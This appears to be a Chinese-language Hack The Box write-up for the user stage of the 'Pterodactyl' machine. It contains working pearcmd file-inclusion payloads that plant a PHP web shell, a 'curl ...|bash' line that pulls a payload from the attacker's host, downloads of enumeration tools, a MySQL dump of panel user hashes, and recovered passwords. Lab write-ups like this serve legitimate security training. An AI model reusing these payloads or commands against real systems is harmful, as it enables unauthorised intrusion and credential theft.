HTB 赛季10 - Pterodactyl - user

复制代码

10.129.16.212

nmap扫描

复制代码

sudo nmap --top-ports 10000 10.129.16.212 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.16.212 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.16.212 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.16.212 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

![[Pasted image 20260208171012.png]]

http://pterodactyl.htb/changelog.txt

![[Pasted image 20260208171809.png]]

我们注意到其背后有一个存在RCE的Panel中间件。我们对Web应用进行枚举

复制代码

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u http://pterodactyl.htb/FUZZ -e .php -mc all

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://pterodactyl.htb/ -H 'Host: FUZZ.pterodactyl.htb' -mc all -fw 18

![[Pasted image 20260208172226.png]]

![[Pasted image 20260208172440.png]]

我们了解到这个漏洞存在，经过大量尝试，我们发现该漏洞是一种php文件包含的变种，他包含了pearcmd后，导致了RCE。我的payload如下

复制代码

/locales/locale.json?locale=../../../../../../../../../../usr/share/php/PEAR/&namespace=pearcmd&+config-create+/'<?=phpinfo()?>'+/tmp/info.php

![[Pasted image 20260208183251.png]]

复制代码

/locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=info

![[Pasted image 20260208183309.png]]

我们开始反连

复制代码

/locales/locale.json?locale=../../../../../../../../../../usr/share/php/PEAR/&namespace=pearcmd&+config-create+/'<?=system($_GET["cmd"])?>'+/tmp/shell.php

![[Pasted image 20260208183354.png]]

复制代码

/locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=shell&cmd=curl+http://10.10.14.14/pwn|bash

![[Pasted image 20260208183543.png]]

![[Pasted image 20260208183627.png]]

上linpeas

复制代码

wget http://10.10.14.14:81/linpeas.sh && chmod 755 linpeas.sh && ./linpeas.sh

![[Pasted image 20260208184031.png]]

喷洒密码，没有用

复制代码

PteraPanel

wget http://10.10.14.14:81/pspy64 && chmod 755 pspy64 && ./pspy64

pterodactyl
PteraPanel

mysql -h127.0.0.1 -upterodactyl -pPteraPanel -e 'Show databases;use panel;show tables;Select * from users;Select username,password from users;'

![[Pasted image 20260208190605.png]]

![[Pasted image 20260208191849.png]]

复制代码

ssh phileasfogg3@10.129.16.212 
!QAZ2wsx

![[Pasted image 20260208191631.png]]

我到这里发现了一封邮件并确认时使用udisk2的相关漏洞，但是我始终没能根据描述完成攻击。